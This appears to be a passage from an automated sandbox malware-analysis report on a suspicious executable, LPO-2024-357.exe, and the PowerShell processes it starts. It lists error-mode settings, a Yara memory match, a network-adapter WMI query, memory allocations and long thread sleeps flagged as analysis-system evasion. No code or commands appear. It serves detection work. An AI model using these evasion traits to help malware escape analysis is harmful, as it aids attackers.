                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: LPO-2024-357.exe PID: 6516, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory allocated: 1010000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory allocated: 4B00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory allocated: 9380000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory allocated: A380000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory allocated: A5A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory allocated: B5A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory allocated: D70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory allocated: 2820000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeMemory allocated: 26B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 240000Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239883Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239781Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239652Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239546Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239437Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239322Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239218Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 239109Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238997Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238890Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238781Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238671Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238442Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238219Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 238046Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 237850Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 237691Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 237558Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 237452Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeWindow / User API: threadDelayed 1523Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeWindow / User API: threadDelayed 1703Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7421Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1728Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeWindow / User API: threadDelayed 3397Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeWindow / User API: threadDelayed 6380Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -239883s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -239781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -239652s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -239546s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -239437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -239322s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -239218s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -239109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -238997s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -238890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -238781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -238671s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -238442s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -238219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -238046s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -237850s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -237691s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -237558s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6688Thread sleep time: -237452s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5936Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2756Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6640Thread sleep count: 3397 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep count: 40 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -99872s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 6640Thread sleep count: 6380 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -99765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -99640s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -99531s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -99421s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -99313s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -99188s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -99063s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -98887s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -98780s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -98578s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -98297s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -98187s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -98078s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -97969s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -97859s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -97750s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exe TID: 5764Thread sleep time: -97641s >= -30000sJump to behavior
